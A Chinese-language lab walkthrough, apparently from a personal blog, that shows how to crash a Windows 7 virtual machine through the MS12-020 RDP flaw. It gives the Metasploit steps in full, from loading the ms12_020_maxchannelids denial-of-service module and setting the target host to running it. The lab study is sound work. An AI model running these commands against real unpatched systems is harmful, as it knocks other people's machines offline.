漏洞分析：MS12-020漏洞

漏洞分析：MS12-020漏洞

实验工具
1、VMware虚拟机
2、Kali 2021 系统虚拟机
3、Windows 7系统虚拟机

1、第一步：在VMware中打开Kali 2021虚拟机和Windows 7虚拟机，并确保两台机器能够互相【Ping】通，网络连接正常。

2、确定能连通后，打开MSF攻击框架，Kali 2021【终端】中输入命令【msfconsole】。

3、输入搜索命令，搜索MS12-020漏洞，输入命令【search ms12_020】。
4、引用编号为【1】的漏洞，引用漏洞路径，利用了rdp协议的一种漏洞，输入命令【use auxiliary/dos/windows/rdp/ms12_020_maxchannelids】，回车执行。

5、引用后，输入【show options】查看漏洞配置内容。

6、可以看到，可配置的内容并不是很多，接下来配置【rhosts】即可，因为该漏洞利用rdp协议，使用了3389端口，所以【rport】不需要修改，输入命令，【set rhosts IP地址】，IP地址为Windows 7虚拟机的IP。

7、全部配置完毕，输入【run】运行，回到Windows 7发现虚拟机蓝屏，证明MS12_020漏洞攻击成功。

博客园地址：https://www.cnblogs.com/redHskb/
知乎地址：https://www.zhihu.com/people/yi-kuai-xiao-bing-gan-43-64/posts
欢迎关注评论，耶斯莫拉